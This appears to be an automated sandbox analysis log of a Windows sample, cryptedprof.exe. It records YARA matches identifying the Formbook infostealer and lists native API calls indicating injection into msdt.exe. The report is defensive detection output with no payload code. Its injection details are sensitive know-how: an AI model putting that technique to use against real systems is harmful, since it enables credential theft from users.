          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.cryptedprof.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419D60 NtCreateFile,3_2_00419D60
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E10 NtReadFile,3_2_00419E10
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E90 NtClose,3_2_00419E90
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419F40 NtAllocateVirtualMemory,3_2_00419F40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419D5A NtCreateFile,3_2_00419D5A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419DB4 NtReadFile,3_2_00419DB4
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419E8A NtClose,3_2_00419E8A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00419F3C NtAllocateVirtualMemory,3_2_00419F3C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00AF98F0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00AF9860
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9840 NtDelayExecution,LdrInitializeThunk,3_2_00AF9840
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF99A0 NtCreateSection,LdrInitializeThunk,3_2_00AF99A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00AF9910
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A20 NtResumeThread,LdrInitializeThunk,3_2_00AF9A20
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00AF9A00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A50 NtCreateFile,LdrInitializeThunk,3_2_00AF9A50
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95D0 NtClose,LdrInitializeThunk,3_2_00AF95D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9540 NtReadFile,LdrInitializeThunk,3_2_00AF9540
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00AF96E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00AF9660
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00AF97A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,3_2_00AF9780
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,3_2_00AF9710
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF98A0 NtWriteVirtualMemory,3_2_00AF98A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9820 NtEnumerateKey,3_2_00AF9820
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFB040 NtSuspendThread,3_2_00AFB040
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF99D0 NtCreateProcessEx,3_2_00AF99D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9950 NtQueueApcThread,3_2_00AF9950
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A80 NtOpenDirectoryObject,3_2_00AF9A80
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9A10 NtQuerySection,3_2_00AF9A10
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFA3B0 NtGetContextThread,3_2_00AFA3B0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9B00 NtSetValueKey,3_2_00AF9B00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF95F0 NtQueryInformationFile,3_2_00AF95F0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9520 NtWaitForSingleObject,3_2_00AF9520
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AFAD30 NtSetContextThread,3_2_00AFAD30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9560 NtWriteFile,3_2_00AF9560
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF96D0 NtCreateKey,3_2_00AF96D0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9610 NtEnumerateValueKey,3_2_00AF9610
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9670 NtQueryInformationProcess,3_2_00AF9670
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF9650 NtQueryValueKey,3_2_00AF9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_046D9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9840 NtDelayExecution,LdrInitializeThunk,7_2_046D9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9540 NtReadFile,LdrInitializeThunk,7_2_046D9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_046D9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95D0 NtClose,LdrInitializeThunk,7_2_046D95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99A0 NtCreateSection,LdrInitializeThunk,7_2_046D99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_046D9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A50 NtCreateFile,LdrInitializeThunk,7_2_046D9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9650 NtQueryValueKey,LdrInitializeThunk,7_2_046D9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_046D96E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D96D0 NtCreateKey,LdrInitializeThunk,7_2_046D96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9710 NtQueryInformationToken,LdrInitializeThunk,7_2_046D9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9FE0 NtCreateMutant,LdrInitializeThunk,7_2_046D9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9780 NtMapViewOfSection,LdrInitializeThunk,7_2_046D9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DB040 NtSuspendThread,7_2_046DB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9820 NtEnumerateKey,7_2_046D9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98F0 NtReadVirtualMemory,7_2_046D98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D98A0 NtWriteVirtualMemory,7_2_046D98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9560 NtWriteFile,7_2_046D9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9950 NtQueueApcThread,7_2_046D9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9520 NtWaitForSingleObject,7_2_046D9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DAD30 NtSetContextThread,7_2_046DAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D95F0 NtQueryInformationFile,7_2_046D95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D99D0 NtCreateProcessEx,7_2_046D99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9670 NtQueryInformationProcess,7_2_046D9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A20 NtResumeThread,7_2_046D9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A00 NtProtectVirtualMemory,7_2_046D9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9610 NtEnumerateValueKey,7_2_046D9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A10 NtQuerySection,7_2_046D9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9A80 NtOpenDirectoryObject,7_2_046D9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9760 NtOpenProcess,7_2_046D9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9770 NtSetInformationFile,7_2_046D9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA770 NtOpenThread,7_2_046DA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9730 NtQueryVirtualMemory,7_2_046D9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D9B00 NtSetValueKey,7_2_046D9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA710 NtOpenProcessToken,7_2_046DA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D97A0 NtUnmapViewOfSection,7_2_046D97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046DA3B0 NtGetContextThread,7_2_046DA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E90 NtClose,7_2_02C79E90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E10 NtReadFile,7_2_02C79E10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F40 NtAllocateVirtualMemory,7_2_02C79F40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D60 NtCreateFile,7_2_02C79D60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79E8A NtClose,7_2_02C79E8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79F3C NtAllocateVirtualMemory,7_2_02C79F3C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79DB4 NtReadFile,7_2_02C79DB4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C79D5A NtCreateFile,7_2_02C79D5A
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403486
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004072721_2_00407272
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00406A9B1_2_00406A9B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A981_2_70991A98
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004010273_2_00401027
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041E03E3_2_0041E03E
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041E2A13_2_0041E2A1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041D38B3_2_0041D38B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041D5F13_2_0041D5F1
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409E403_2_00409E40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409E3B3_2_00409E3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041DF463_2_0041DF46
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CFA63_2_0041CFA6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A03_2_00AE20A0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B820A83_2_00B820A8
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB0903_2_00ACB090
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B828EC3_2_00B828EC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B8E8243_2_00B8E824
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA8303_2_00ADA830
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B710023_2_00B71002
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF3_2_00AD99BF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD41203_2_00AD4120
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABF9003_2_00ABF900
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B822AE3_2_00B822AE
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF3_2_00B74AEF
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FA2B3_2_00B6FA2B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEEBB03_2_00AEEBB0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B623E33_2_00B623E3
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7DBD23_2_00B7DBD2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B703DA3_2_00B703DA
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEABD83_2_00AEABD8
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82B283_2_00B82B28
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA3093_2_00ADA309
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAB403_2_00ADAB40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B744963_2_00B74496
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC841F3_2_00AC841F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7D4663_2_00B7D466
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE25813_2_00AE2581
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACD5E03_2_00ACD5E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B825DD3_2_00B825DD
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB0D203_2_00AB0D20
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82D073_2_00B82D07
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B81D553_2_00B81D55
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B82EF73_2_00B82EF7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD6E303_2_00AD6E30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7D6163_2_00B7D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A841F7_2_046A841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047510027_2_04751002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A07_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047620A87_2_047620A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB0907_2_046AB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761D557_2_04761D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04690D207_2_04690D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B41207_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469F9007_2_0469F900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762D077_2_04762D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E07_2_046AD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C25817_2_046C2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B6E307_2_046B6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762EF77_2_04762EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047622AE7_2_047622AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04762B287_2_04762B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761FF17_2_04761FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475DBD27_2_0475DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CEBB07_2_046CEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7E2A17_2_02C7E2A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7D38B7_2_02C7D38B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7E03E7_2_02C7E03E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C69E407_2_02C69E40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C69E3B7_2_02C69E3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CFA67_2_02C7CFA6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C62FB07_2_02C62FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C62D907_2_02C62D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0469B150 appears 35 times
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: String function: 00ABB150 appears 121 times
          Source: cryptedprof.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: cryptedprof.exe, 00000001.00000003.327029205.0000000002D3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000001.00000002.335855090.00000000028F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.388818719.0000000000D3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cryptedprof.exe
          Source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs cryptedprof.exe
          Source: cryptedprof.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.cryptedprof.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.cryptedprof.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.cryptedprof.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
